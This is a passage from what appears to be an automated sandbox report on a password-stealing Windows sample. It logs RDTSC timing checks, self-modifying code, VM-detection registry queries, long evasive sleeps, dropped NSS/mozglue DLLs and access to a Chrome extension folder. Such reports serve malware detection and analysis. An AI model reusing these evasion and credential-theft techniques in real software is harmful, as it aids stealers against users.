                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30A3A second address: 4B30A46 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 49CD76DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30A46 second address: 4B30AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F69D121AB30h 0x0000000a jmp 00007F69D121AB35h 0x0000000f popfd 0x00000010 popad 0x00000011 popad 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 pushad 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d jmp 00007F69D121AB32h 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F69D121AB30h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30AA9 second address: 4B30AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30AAD second address: 4B30AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30AB1 second address: 4B30AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30AB7 second address: 4B30ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30ABD second address: 4B30AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30AC1 second address: 4B30AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30AC5 second address: 4B30B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F69D1080A4Dh 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F69D1080A4Eh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F69D1080A53h 0x0000001e and eax, 4CA18C5Eh 0x00000024 jmp 00007F69D1080A59h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30B6F second address: 4B30B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30B80 second address: 4B30BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F69D1080A58h 0x00000011 or cx, 56A8h 0x00000016 jmp 00007F69D1080A4Bh 0x0000001b popfd 0x0000001c popad 0x0000001d pop ebx 0x0000001e jmp 00007F69D1080A56h 0x00000023 mov esp, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30BE1 second address: 4B30BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40A7A second address: 4B40A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40A80 second address: 4B40A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40A84 second address: 4B40AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F69D1080A54h 0x00000010 xor si, FF48h 0x00000015 jmp 00007F69D1080A4Bh 0x0000001a popfd 0x0000001b push esi 0x0000001c pushfd 0x0000001d jmp 00007F69D1080A4Fh 0x00000022 adc ax, E18Eh 0x00000027 jmp 00007F69D1080A59h 0x0000002c popfd 0x0000002d pop esi 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F69D1080A53h 0x00000038 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB0FD5 second address: 4BB0FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 56D9h 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov cl, 54h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB043F second address: 4BB044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB044F second address: 4BB0453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB0453 second address: 4BB0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F69D1080A53h 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB0471 second address: 4BB04B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D121AB2Fh 0x00000008 movzx esi, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F69D121AB2Bh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F69D121AB35h 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB04B0 second address: 4BB04C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB04C0 second address: 4BB04C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB02ED second address: 4BB031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D1080A4Fh 0x00000009 sbb ch, FFFFFFBEh 0x0000000c jmp 00007F69D1080A59h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50178 second address: 4B501B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, 927Bh 0x0000000f jmp 00007F69D121AB30h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx edi, si 0x0000001a mov edi, esi 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 mov cl, bh 0x00000027 push eax 0x00000028 push edx 0x00000029 mov si, 7627h 0x0000002d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B501B6 second address: 4B501E0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F69D1080A4Ch 0x00000008 and ax, 0D58h 0x0000000d jmp 00007F69D1080A4Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B501E0 second address: 4B501E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B501E4 second address: 4B501EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB0689 second address: 4BB068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB068D second address: 4BB0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB0693 second address: 4BB06B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB39h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB06B0 second address: 4BB06B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB06B4 second address: 4BB06C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4BB06C3 second address: 4BB06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSpecial instruction interceptor: First address: 51E971 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSpecial instruction interceptor: First address: 51E87C instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSpecial instruction interceptor: First address: 6B9F16 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSpecial instruction interceptor: First address: 6BA348 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSpecial instruction interceptor: First address: 6B8B8E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeSpecial instruction interceptor: First address: 7428A8 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 82E971 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 82E87C instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 9C9F16 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 9CA348 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 9C8B8E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: A528A8 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeCode function: 5_2_04BB0681 rdtsc 5_2_04BB0681
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 7970Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 2029Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: foregroundWindowGot 437Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1149Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1227Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 410Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1206Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1166Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1182Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeWindow / User API: threadDelayed 848Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeAPI coverage: 0.8 %
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe TID: 7356Thread sleep count: 314 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8084Thread sleep time: -60030s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8064Thread sleep count: 1149 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8064Thread sleep time: -2299149s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8056Thread sleep count: 1227 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8056Thread sleep time: -2455227s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8044Thread sleep count: 410 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8044Thread sleep time: -12300000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5672Thread sleep time: -540000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8072Thread sleep count: 1206 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8072Thread sleep time: -2413206s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8068Thread sleep count: 1166 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8068Thread sleep time: -2333166s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8076Thread sleep count: 1182 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8076Thread sleep time: -2365182s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe TID: 7428Thread sleep count: 848 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6C4DC930
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: #Windows 10 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
